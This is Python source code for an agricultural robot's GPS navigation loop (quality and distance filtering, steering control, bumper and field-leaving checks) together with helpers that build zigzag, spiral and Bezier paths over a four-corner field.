if cur_pos[2] != "4" and config.ALLOW_GPS_BAD_QUALITY_NTRIP_RESTART:
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(logger_full)
# stop robot due to bad point quality if allowed
if config.ALLOW_GPS_BAD_QUALITY_STOP:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
logger_full.write_and_flush(
"Stopping the robot for lack of quality gps 4, waiting for it...\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
prev_bad_quality_pos_obj = cur_pos_obj
gps_reconnect_ts = time.time()
while True:
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
# check if it's a new point
if math.isclose(cur_pos_obj.creation_ts, prev_bad_quality_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new " \
"GPS point (quality filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
continue
else:
prev_bad_quality_pos_obj = cur_pos_obj
# check if it's a good quality point
if cur_pos[2] != "4":
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(
logger_full)
else:
msg = "The gps has regained quality 4, starting movement"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
# points filter by distance
prev_cur_distance = nav.get_distance(prev_pos, cur_pos)
if config.ALLOW_GPS_PREV_CUR_DIST_STOP and prev_cur_distance > config.PREV_CUR_POINT_MAX_DIST:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = f"Stopping the robot due to GPS points filter by distance (assuming current position point " \
f"{str(cur_pos)} is wrong as distance between current position and prev. position {str(prev_pos)}" \
f" is bigger than config.PREV_CUR_POINT_MAX_DIST={str(config.PREV_CUR_POINT_MAX_DIST)})"
logger_full.write_and_flush(msg + "\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
prev_bad_quality_pos_obj = cur_pos_obj
gps_reconnect_ts = distance_wait_start_ts = time.time()
while True:
if time.time() - distance_wait_start_ts > config.GPS_DIST_WAIT_TIME_MAX:
msg = f"Stopping waiting for good prev-cur distance due to timeout, using current point " \
f"{cur_pos} and starting moving again"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
# check if it's a new point
if math.isclose(cur_pos_obj.creation_ts, prev_bad_quality_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new " \
"GPS point (distance filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
continue
else:
prev_bad_quality_pos_obj = cur_pos_obj
# check if it's a good quality point or ignore point quality if bad quality stop is not allowed
if cur_pos[2] != "4" and config.ALLOW_GPS_BAD_QUALITY_NTRIP_RESTART:
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(logger_full)
continue
# check if distance became ok
prev_cur_distance = nav.get_distance(prev_pos, cur_pos)
if prev_cur_distance <= config.PREV_CUR_POINT_MAX_DIST:
msg = f"Starting moving again after GPS points filter by distance as distance become OK " \
f"({str(prev_cur_distance)})"
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
point_reading_t = time.time()
trajectory_saver.save_point(cur_pos)
if ui_msg_queue is not None and time.time()-last_send_gps_time >= 1:
try:
ui_msg_queue_send_ts = time.time()
ui_msg_queue.send(json.dumps(
{"last_gps": cur_pos}), timeout=config.QUEUE_WAIT_TIME_MAX)
last_send_gps_time = time.time()
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_send_et = last_send_gps_time - ui_msg_queue_send_ts
if ui_msg_queue_send_et < ui_msg_queue_perf["min_time"]:
ui_msg_queue_perf["min_time"] = ui_msg_queue_send_et
if ui_msg_queue_send_et > ui_msg_queue_perf["max_time"]:
ui_msg_queue_perf["max_time"] = ui_msg_queue_send_et
ui_msg_queue_perf["total_time"] += ui_msg_queue_send_et
ui_msg_queue_perf["total_sends"] += 1
except posix_ipc.BusyError:
msg = f"Current position wasn't sent to ui_msg_queue likely due to sending timeout " \
f"(max wait time: config.QUEUE_WAIT_TIME_MAX={config.QUEUE_WAIT_TIME_MAX}"
logger_full.write(msg + "\n")
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf["timeouts_exceeded"] += 1
if config.CONTINUOUS_INFORMATION_SENDING and not degraded_navigation_mode:
notification.set_current_coordinate(cur_pos)
distance = nav.get_distance(cur_pos, coords_from_to[1])
last_corridor_side = current_corridor_side
perpendicular, current_corridor_side = nav.get_deviation(
coords_from_to[0], coords_from_to[1], cur_pos)
# stop the robot if it has left the field
if enable_field_leaving_protection:
for pt_idx in range(len(cur_field)):
last_point = pt_idx + 1 == len(cur_field)
if last_point:
deviation, side = nav.get_deviation(cur_field[pt_idx], cur_field[0], cur_pos)
else:
deviation, side = nav.get_deviation(cur_field[pt_idx], cur_field[pt_idx + 1], cur_pos)
if side == -1 and deviation > config.LEAVING_PROTECTION_DISTANCE_MAX:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
msg = f"Robot is stopped due to leaving the field. Cur pos: '{str(cur_pos)}'; " \
f"Field comparison vector - P1: '{str(cur_field[pt_idx])}', " \
f"P2: '{str(cur_field[0] if last_point else cur_field[pt_idx + 1])}'"
print(msg)
logger_full.write_and_flush(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# check if arrived
_, side = nav.get_deviation(
coords_from_to[1], stop_helping_point, cur_pos)
# if distance <= config.COURSE_DESTINATION_DIFF: # old way
if side != 1: # TODO: maybe should use both side and distance checking methods at once
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
# msg = "Arrived (allowed destination distance difference " + str(config.COURSE_DESTINATION_DIFF) + " mm)"
# TODO: service will reload script even if it done his work?
msg = "Arrived to " + str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
# put the wheel straight
if wheels_straight:
response = smoothie.custom_move_to(A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK: # TODO: what if response is not ok?
msg = "Couldn't turn wheels to center (0), smoothie response:\n" + \
response
print(msg)
logger_full.write(msg + "\n")
else:
# save wheels angle
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
break
# TODO check for bug: arrival check applies single speed for all path (while multiple speeds are applied)
# check if can arrived
if vesc_engine.get_current_rpm(vesc_engine.PROPULSION_KEY) / config.MULTIPLIER_SI_SPEED_TO_RPM * \
config.MANEUVERS_FREQUENCY > nav.get_distance(cur_pos, coords_from_to[1]):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
msg = "Will have arrived before the next point to " + \
str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
break
# reduce speed if near the target point
if config.USE_SPEED_LIMIT:
distance_from_start = nav.get_distance(coords_from_to[0], cur_pos)
close_to_end = distance < config.DECREASE_SPEED_TRESHOLD or distance_from_start < config.DECREASE_SPEED_TRESHOLD
msg = "Distance to B: " + str(distance)
# print(msg)
logger_full.write(msg + "\n")
msg = "Prev: " + str(prev_pos) + " Cur: " + str(cur_pos) + " A: " + str(coords_from_to[0]) \
+ " B: " + str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
# pass by cur points which are very close to prev point to prevent angle errors when robot is staying
# (too close points in the same position can produce false huge angles)
navigation_prediction.run_prediction(coords_from_to, cur_pos)
# raw_angle_cruise = nav.get_angle(coords_from_to[0], cur_pos, cur_pos, coords_from_to[1])
# raw_angle_legacy = nav.get_angle(prev_pos, cur_pos, cur_pos, coords_from_to[1])
raw_angle_centroid = nav.get_angle(
prev_pos, cur_pos, coords_from_to[0], coords_from_to[1])
raw_angle_cruise = - current_corridor_side * math.log(1+perpendicular)
if nav.get_distance(coords_from_to[0], coords_from_to[1]) < config.CORNER_THRESHOLD and nav.get_distance(coords_from_to[1], future_points[0][0]) < config.CORNER_THRESHOLD:
# if abs(raw_angle_legacy)>config.LOST_THRESHOLD:
centroid_factor = config.CENTROID_FACTOR_LOST
cruise_factor = 1/centroid_factor
else:
centroid_factor = config.CENTROID_FACTOR_ORIENTED
cruise_factor = 1
raw_angle = raw_angle_centroid*centroid_factor + raw_angle_cruise*cruise_factor
# raw_angle = butter_lowpass_filter(raw_angle, 0.5, 4, 6)
if config.LEARN_GO_STRAIGHT:
if config.MIN_PERPENDICULAR_GO_STRAIGHT >= perpendicular:
learn_go_straight_index += 1
learn_go_straight_history.append(raw_angle)
if len(learn_go_straight_history) >= config.VALUES_LEARN_GO_STRAIGHT:
learn_go_straight = sum(
learn_go_straight_history)/len(learn_go_straight_history)
msg = f"Average angle applied to the wheel for the robot to have found : {learn_go_straight}."
logger_full.write_and_flush(msg + "\n")
# TODO opening and closing file 4 times per second
with open(config.LEARN_GO_STRAIGHT_FILE, "w+") as learn_go_straight_file:
learn_go_straight_file.write(str(learn_go_straight))
else:
learn_go_straight_index = 0
# NAVIGATION STATE MACHINE
if prev_cur_distance < config.PREV_CUR_POINT_MIN_DIST:
raw_angle = last_correct_raw_angle
# print("The distance covered is low")
point_status = "skipped"
# register the last position where the robot almost stop
# in order to disable the deviation servo for a config.POURSUIT_LIMIT length and then resume in cruise
last_skipped_point = cur_pos
else:
last_correct_raw_angle = raw_angle
point_status = "correct"
almost_start = nav.get_distance(last_skipped_point, cur_pos)
# sum(e)
if len(raw_angles_history) >= config.WINDOW:
raw_angles_history.pop(0)
raw_angles_history.append(raw_angle)
# print("len(raw_angles_history):",len(raw_angles_history))
sum_angles = sum(raw_angles_history)
if sum_angles > config.SUM_ANGLES_HISTORY_MAX:
msg = "Sum angles " + str(sum_angles) + " is bigger than max allowed value " + \
str(config.SUM_ANGLES_HISTORY_MAX) + ", setting to " + \
str(config.SUM_ANGLES_HISTORY_MAX)
# print(msg)
logger_full.write(msg + "\n")
# Get Ready to go down as soon as the angle get negatif
raw_angles_history[len(raw_angles_history) -
1] -= sum_angles - config.SUM_ANGLES_HISTORY_MAX
sum_angles = config.SUM_ANGLES_HISTORY_MAX
elif sum_angles < -config.SUM_ANGLES_HISTORY_MAX:
msg = "Sum angles " + str(sum_angles) + " is less than min allowed value " + \
str(-config.SUM_ANGLES_HISTORY_MAX) + ", setting to " + \
str(-config.SUM_ANGLES_HISTORY_MAX)
# print(msg)
logger_full.write(msg + "\n")
# get Ready to go up as soon as the angle get positive:
raw_angles_history[len(raw_angles_history)-1] += - \
sum_angles - config.SUM_ANGLES_HISTORY_MAX
sum_angles = -config.SUM_ANGLES_HISTORY_MAX
# KP = 0.2*0,55
# KI = 0.0092*0,91
KP = getSpeedDependentConfigParam(
config.KP, SI_speed, "KP", logger_full)
KI = getSpeedDependentConfigParam(
config.KI, SI_speed, "KI", logger_full)
angle_kp_ki = raw_angle * KP + sum_angles * KI
# smoothie -Value == left, Value == right
target_angle_sm = angle_kp_ki * -config.A_ONE_DEGREE_IN_SMOOTHIE
# target_angle_sm = 0 #Debug COVID_PLACE
ad_wheels_pos = smoothie.get_adapter_current_coordinates()["A"]
# sm_wheels_pos = smoothie.get_smoothie_current_coordinates()["A"]
sm_wheels_pos = "off"
# compute order angle (smoothie can't turn for huge values immediately also as cancel movement,
# so we need to do nav. actions in steps)
order_angle_sm = target_angle_sm - ad_wheels_pos
# check for out of update frequency and smoothie execution speed range (for nav wheels)
if order_angle_sm > config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND * \
config.A_ONE_DEGREE_IN_SMOOTHIE:
msg = "Order angle changed from " + str(order_angle_sm) + " to " + str(
config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND +
config.A_ONE_DEGREE_IN_SMOOTHIE) + " due to exceeding degrees per tick allowed range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND * \
config.A_ONE_DEGREE_IN_SMOOTHIE
elif order_angle_sm < -(config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE):
msg = "Order angle changed from " + str(order_angle_sm) + " to " + str(-(
config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE)) + " due to exceeding degrees per tick allowed range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = -(config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE)
# convert to global smoothie coordinates
order_angle_sm += ad_wheels_pos
# checking for out of smoothie supported range
if order_angle_sm > config.A_MAX:
msg = "Global order angle changed from " + str(order_angle_sm) + " to config.A_MAX = " + \
str(config.A_MAX) + \
" due to exceeding smoothie allowed values range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.A_MAX
elif order_angle_sm < config.A_MIN:
msg = "Global order angle changed from " + str(order_angle_sm) + " to config.A_MIN = " + \
str(config.A_MIN) + \
" due to exceeding smoothie allowed values range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.A_MIN
# cork x movement during periphery scans control
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
if x_scan_idx_increasing:
x_scan_cur_idx += 1
if x_scan_cur_idx >= len(config.X_MOVEMENT_CAMERA_POSITIONS):
x_scan_idx_increasing = False
x_scan_cur_idx -= 2
else:
x_scan_cur_idx -= 1
if x_scan_cur_idx < 0:
x_scan_idx_increasing = True
x_scan_cur_idx += 2
# TODO do we check SI_speed earlier and do proper calculations and angle validations if here we'll get here a negative order angle instead of positive?
response = smoothie.custom_move_to(
A_F=config.A_F_MAX,
A=order_angle_sm if SI_speed >= 0 else -order_angle_sm,
X_F=config.X_MOVEMENT_CAMERA_X_F[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else None,
X=config.X_MOVEMENT_CAMERA_POSITIONS[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else None
)
if response != smoothie.RESPONSE_OK:
msg = "Couldn't turn wheels! Smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
# TODO opening and closing file too often (likely 4 times per second)
# save wheels angle
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
raw_angle = round(raw_angle, 2)
angle_kp_ki = round(angle_kp_ki, 2)
order_angle_sm = round(order_angle_sm, 2)
sum_angles = round(sum_angles, 2)
distance = round(distance, 2)
ad_wheels_pos = round(ad_wheels_pos, 2)
perpendicular = round(perpendicular, 2)
# sm_wheels_pos = round(sm_wheels_pos, 2)
gps_quality = cur_pos[2]
corridor = ""
if current_corridor_side == -1:
corridor = "left"
elif current_corridor_side == 1:
corridor = "right"
raw_angle_cruise = round(raw_angle_cruise, 2)
msg = str(gps_quality).ljust(5) + \
str(raw_angle).ljust(8) + \
str(angle_kp_ki).ljust(8) + \
str(order_angle_sm).ljust(8) + \
str(sum_angles).ljust(8) + \
str(distance).ljust(13) + \
str(ad_wheels_pos).ljust(8) + \
str(sm_wheels_pos).ljust(9) + \
point_status.ljust(12) + \
str(perpendicular).ljust(10) + \
corridor.ljust(9) + \
str(centroid_factor).ljust(16) + \
str(cruise_factor).ljust(14)
print(msg)
logger_full.write(msg + "\n")
# TODO vesc sensors are being asked 4 times per second
# send voltage and track bumper state
vesc_data = vesc_engine.get_sensors_data(
report_field_names, vesc_engine.PROPULSION_KEY)
if vesc_data is not None and "input_voltage" in vesc_data:
if bumper_is_pressed is None:
bumper_is_pressed = not vesc_data["input_voltage"] > config.VESC_BUMBER_UNTRIGGER_VOLTAGE
if bumper_is_pressed:
msg = f"Bumper is pressed initially before starting moving to point. " \
f"({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
elif not bumper_is_pressed and vesc_data["input_voltage"] < config.VESC_BUMBER_TRIGGER_VOLTAGE:
bumper_is_pressed = True
msg = f"Bumper was pressed. ({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
elif bumper_is_pressed and vesc_data["input_voltage"] > config.VESC_BUMBER_UNTRIGGER_VOLTAGE:
bumper_is_pressed = False
msg = f"Bumper was unpressed. ({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
if config.CONTINUOUS_INFORMATION_SENDING:
notification.set_input_voltage(vesc_data["input_voltage"])
prev_pos_obj = cur_pos_obj
prev_pos = prev_pos_obj.as_old_list
msg = "Nav calc time: " + str(time.time() - nav_start_t)
logger_full.write(msg + "\n\n")
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf["avg_time"] = ui_msg_queue_perf["total_time"] / \
ui_msg_queue_perf["total_sends"]
msg = f"Position sending performance report: {ui_msg_queue_perf}"
if config.VERBOSE:
print(msg)
logger_full.write(msg + "\n")
def send_voltage_thread_tf(vesc_engine: adapters.VescAdapterV4, ui_msg_queue):
    """Poll the VESC until an input-voltage reading is available, then publish
    it (JSON-encoded) to the UI message queue, if one is given.

    One-shot thread target: exits after the first successful reading has been
    processed.
    """
    while True:
        sensors = vesc_engine.get_sensors_data(
            ['input_voltage'], vesc_engine.PROPULSION_KEY)
        if sensors is None:
            # no data yet - wait a bit before polling the VESC again
            time.sleep(1)
            continue
        voltage = sensors["input_voltage"]
        if ui_msg_queue is not None:
            ui_msg_queue.send(json.dumps({"input_voltage": voltage}))
        break
def getSpeedDependentConfigParam(configParam: dict, SI_speed: float, paramName: str, logger_full: utility.Logger):
    """Look up the value bound to the given SI speed in a speed-keyed config dict.

    Logs and terminates the whole process when the speed has no entry, since
    the robot cannot continue without a valid control parameter.
    """
    try:
        return configParam[SI_speed]
    except KeyError:
        msg = f"Speed SI {SI_speed} not present in {paramName}."
        if config.VERBOSE:
            print(msg)
        logger_full.write(msg + "\n")
        exit()
def compute_x1_x2_points(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
    """Compute point x1 at config.MANEUVER_START_DISTANCE from A towards B, and
    point x2 at the same distance from B towards A.

    Returns (None, None) if AB is not longer than twice that distance, as there
    is no room left for robot maneuvers.

    :param point_a:
    :param point_b:
    :param nav:
    :param logger:
    :return: (x1, x2), or (None, None) when the AB vector is too short
    """
    ab_dist = nav.get_distance(point_a, point_b)
    # the AB vector must exceed two maneuver margins, otherwise the robot
    # has no room to maneuver at either end
    if config.MANEUVER_START_DISTANCE * 2 >= ab_dist:
        msg = f"No place for maneuvers; config start maneuver distance is (that will be multiplied by 2): " \
              f"{config.MANEUVER_START_DISTANCE} current moving vector distance is: {ab_dist}" \
              f" Given points are: {point_a} {point_b}"
        logger.write(msg + "\n")
        return None, None
    x1 = nav.get_point_on_vector(point_a, point_b, config.MANEUVER_START_DISTANCE)
    x2 = nav.get_point_on_vector(point_a, point_b, ab_dist - config.MANEUVER_START_DISTANCE)
    return x1, x2
def compute_x2_spiral(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
    """Compute point x2 at maneuver distance + spiral interval from B towards A.

    Distances are taken from config. Returns None if AB is not longer than
    maneuver distance * 2 + interval, as there is no room for robot maneuvers.

    :param point_a:
    :param point_b:
    :param nav:
    :param logger:
    :return: x2 point, or None when the AB vector is too short
    """
    ab_dist = nav.get_distance(point_a, point_b)
    # need room for a maneuver margin at each end plus one spiral interval
    if config.MANEUVER_START_DISTANCE * 2 + config.SPIRAL_SIDES_INTERVAL >= ab_dist:
        msg = f"No place for maneuvers; Config maneuver distance is (that will be multiplied by 2): " \
              f"{config.MANEUVER_START_DISTANCE} Config spiral interval: {config.SPIRAL_SIDES_INTERVAL}" \
              f" Current moving vector distance is: {ab_dist} Given points are: {point_a}" \
              f" {point_b}"
        logger.write(msg + "\n")
        return None
    offset = ab_dist - config.MANEUVER_START_DISTANCE - config.SPIRAL_SIDES_INTERVAL
    return nav.get_point_on_vector(point_a, point_b, offset)
def compute_x1_x2_int_points(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
    """Compute the spiral-interval points x1 (near A) and x2 (near B) on the
    AB vector, each config.SPIRAL_SIDES_INTERVAL away from its endpoint.

    Returns (None, None) if AB is not longer than twice the interval.

    :param point_a:
    :param point_b:
    :param nav:
    :param logger:
    :return: (x1_int, x2_int), or (None, None) when the AB vector is too short
    """
    ab_dist = nav.get_distance(point_a, point_b)
    # the AB vector must exceed two spiral intervals to fit both points
    if config.SPIRAL_SIDES_INTERVAL * 2 >= ab_dist:
        msg = f"No place for maneuvers; Config spiral interval (that will be multiplied by 2): " \
              f"{config.SPIRAL_SIDES_INTERVAL} Current moving vector distance is: {ab_dist}" \
              f" Given points are: {point_a} {point_b}"
        if config.VERBOSE:
            print(msg)
        logger.write(msg + "\n")
        return None, None
    x1_int = nav.get_point_on_vector(point_a, point_b, config.SPIRAL_SIDES_INTERVAL)
    x2_int = nav.get_point_on_vector(point_a, point_b, ab_dist - config.SPIRAL_SIDES_INTERVAL)
    return x1_int, x2_int
def add_points_to_path(path: list, *args):
    """Append the given points to *path* in order.

    Stops at the first invalid point: a point that is None, or a multi-item
    point whose first item is None. Points seen before the invalid one are
    still appended. Returns True when every point was added, False otherwise.
    """
    for candidate in args:
        invalid = candidate is None or (len(candidate) > 1 and candidate[0] is None)
        if invalid:
            return False
        path.append(candidate)
    return True
def check_points_for_nones(*args):
    """Return True when none of the given points is None, False otherwise."""
    return all(point is not None for point in args)
def compute_bezier_points(point_0, point_1, point_2):
    """Sample a quadratic Bezier curve defined by control points p0, p1, p2.

    Returns a list of [x, y] pairs, one per parameter value t evenly spaced
    on [0, 1]; the number of samples is config.NUMBER_OF_BEZIER_POINT.
    """
    def _axis(t, p0, p1, p2):
        # expanded quadratic Bezier: (p0 - 2*p1 + p2)*t^2 + 2*(p1 - p0)*t + p0
        return (p0 - 2 * p1 + p2) * (t ** 2) + (2 * p1 - 2 * p0) * t + p0

    return [
        [_axis(t, point_0[0], point_1[0], point_2[0]),
         _axis(t, point_0[1], point_1[1], point_2[1])]
        for t in np.linspace(0, 1, config.NUMBER_OF_BEZIER_POINT)
    ]
def get_rectangle_isosceles_side(turning_radius):
    # Bezier refer \Nextcloud\3. Engineering\navigation
    """Leg length of an isosceles right triangle whose hypotenuse is
    turning_radius * (sqrt(2) - 1)."""
    leg = turning_radius * ((2 ** 0.5) - 1)
    return (0.5 * leg ** 2) ** 0.5
def corner_finish_rounds(turning_radius: float):
    """Number of extra corner rounds needed to cover the "black corridor" left
    at full steering, relative to the robot working width
    (config.FIELD_REDUCE_SIZE)."""
    corridor_width = get_rectangle_isosceles_side(turning_radius)
    if config.VERBOSE:
        print("black corridor width at full steering %2.0f" %
              corridor_width, " millimeters")
    # how many corner round due to robot working width
    return int(corridor_width / config.FIELD_REDUCE_SIZE) + 1
def add_forward_backward_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float, currently_path: list):
    """Obsolete zigzag path builder, kept only so any remaining callers fail
    loudly instead of silently producing a wrong path.

    :raises NotImplementedError: always; use build_forward_backward_path() instead.
    """
    # The former implementation that followed this raise was unreachable dead
    # code (it also depended on a removed helper, compute_x1_x2) and has been
    # deleted; only the guard remains.
    raise NotImplementedError(
        "an obsolete code, use build_forward_backward_path() instead")
def build_forward_backward_path(abcd_points: list,
                                nav: navigation.GPSComputing,
                                logger: utility.Logger,
                                SI_speed_fwd: float,
                                SI_speed_rev: float,
                                path: list = None):
    """Builds zigzag (forward-backward) path to fill given ABCD field.
    Can process 4 non 90 degrees corners fields.
    Will append zigzag points into the existing path if it is not None, otherwise creates a path from scratch.
    Returns python list of gps [[latitude, longitude], speed] points.

    :param abcd_points: field as a list of exactly 4 corner points (A, B, C, D), each a list of >=2 items
    :param nav: GPS computing helper used for distances and on-vector points
    :param logger: log writer (currently unused in the body; kept for interface parity)
    :param SI_speed_fwd: SI speed attached to forward (towards B) path points
    :param SI_speed_rev: SI speed attached to reverse (towards A) path points
    :param path: optional existing path list to append to
    :raises TypeError: when abcd_points, one of its points, or path is not a list
    :raises ValueError: when the field has not exactly 4 points, or a point has <2 items
    :raises RuntimeError: if a generated point could not be added to the path
    """
    # isinstance (rather than exact type comparison) so list subclasses are accepted too
    if not isinstance(abcd_points, list):
        msg = f"Given ABCD path must be a list, got {type(abcd_points).__name__} instead"
        raise TypeError(msg)
    if len(abcd_points) != 4:
        msg = f"Expected 4 ABCD points as input field, got {str(len(abcd_points))} points instead"
        raise ValueError(msg)
    for point_name, point in zip("ABCD", abcd_points):
        if not isinstance(point, list):
            msg = f"Point {point_name} of given ABCD field must be a list, got {type(point).__name__} instead"
            raise TypeError(msg)
        if len(point) < 2:
            msg = f"Point {point_name} of given ABCD field must contain >=2 items, found {str(len(point))} instead"
            raise ValueError(msg)
    if path is None:
        path = []
    elif not isinstance(path, list):
        msg = f"Given ABCD path must be a list type, got {type(path).__name__} instead"
        raise TypeError(msg)
    a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
    # separate stop-flags and BC & AD length control allows correct processing 4 corner non 90 degrees fields
    bc_dist_ok = ad_dist_ok = True
    while bc_dist_ok or ad_dist_ok:
        if not add_points_to_path(path, [b, SI_speed_fwd]):
            msg = f"Failed to add point B={str(b)} to path. This expected never to happen."
            raise RuntimeError(msg)
        if not add_points_to_path(path, [a, SI_speed_rev]):
            msg = f"Failed to add point A={str(a)} to path. This expected never to happen."
            raise RuntimeError(msg)
        # shift the working segment one spiral interval towards C / D; each side
        # stops independently so skewed (non-rectangular) fields stay covered
        if nav.get_distance(b, c) >= config.SPIRAL_SIDES_INTERVAL:
            b = nav.get_point_on_vector(b, c, config.SPIRAL_SIDES_INTERVAL)
        else:
            bc_dist_ok = False
        if nav.get_distance(a, d) >= config.SPIRAL_SIDES_INTERVAL:
            a = nav.get_point_on_vector(a, d, config.SPIRAL_SIDES_INTERVAL)
        else:
            ad_dist_ok = False
    return path
def build_bezier_with_corner_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float):
    """Obsolete spiral path builder, kept only as a guarded stub.

    Always raises NotImplementedError; use build_bezier_path() instead.

    NOTE(review): the original implementation that followed this raise was
    unreachable dead code (the raise was unconditional and the first
    statement) and has been removed. Recover it from version control if the
    corner-finishing logic is ever needed as a reference.

    :param abcd_points: [A, B, C, D] field corner points (unused)
    :param nav: GPS computing helper (unused)
    :param logger: full log writer (unused)
    :param SI_speed_fwd: forward speed in SI units (unused)
    :param SI_speed_rev: reverse speed in SI units (unused)
    :raises NotImplementedError: always
    """
    raise NotImplementedError(
        "an obsolete code, use build_bezier_path() instead")
def build_bezier_path(abcd_points: list,
                      nav: navigation.GPSComputing,
                      logger: utility.Logger,
                      SI_speed_fwd: float,
                      SI_speed_rev: float):
    """Builds spiral path to fill given ABCD field.

    Fills field's missing center with zigzag (forward-backward) movement if
    config.ADD_FORWARD_BACKWARD_TO_END_PATH is set to True.
    Returns python list of gps [[latitude, longitude], speed] points.

    :param abcd_points: [A, B, C, D] field corner points, each a
        [latitude, longitude, ...] list with >= 2 items
    :param nav: GPS computing helper used for distance/point math
    :param logger: full log writer passed down to point computing helpers
    :param SI_speed_fwd: forward speed in SI units attached to spiral points
    :param SI_speed_rev: reverse speed in SI units (used by the center zigzag)
    :raises NotImplementedError: if config.ADD_CORNER_TO_BEZIER_PATH is set
    :raises TypeError: if abcd_points or any of its points is not a list
    :raises ValueError: if point count != 4 or a point has < 2 items
    :raises RuntimeError: if spiral shift values exceed the robot's
        maneuverability and next-iteration points can't be computed
    """
    if config.ADD_CORNER_TO_BEZIER_PATH:
        raise NotImplementedError(
            "config.ADD_CORNER_TO_BEZIER_PATH feature is not ready in new path builder yet")
    # input validation (isinstance instead of type() comparison also accepts list subclasses)
    if not isinstance(abcd_points, list):
        msg = f"Given ABCD path must be a list, got {type(abcd_points).__name__} instead"
        raise TypeError(msg)
    if len(abcd_points) != 4:
        msg = f"Expected 4 ABCD points as input field, got {len(abcd_points)} points instead"
        raise ValueError(msg)
    for point_name, point in zip("ABCD", abcd_points):
        if not isinstance(point, list):
            msg = f"Point {point_name} of given ABCD field must be a list, got {type(point).__name__} instead"
            raise TypeError(msg)
        if len(point) < 2:
            msg = f"Point {point_name} of given ABCD field must contain >=2 items, found {len(point)} instead"
            raise ValueError(msg)
    a, b, c, d = abcd_points  # safe: length was validated above
    path = []
    center_fill_start_point = 0  # 0 is unidentified, 1 is A, 2 is D
    if not add_points_to_path(path, [a, SI_speed_fwd]):
        raise RuntimeError(
            "Failed to add point A (one of the input field description points) into generated path")
    while True:
        # get moving points A1 - ... - D2 spiral
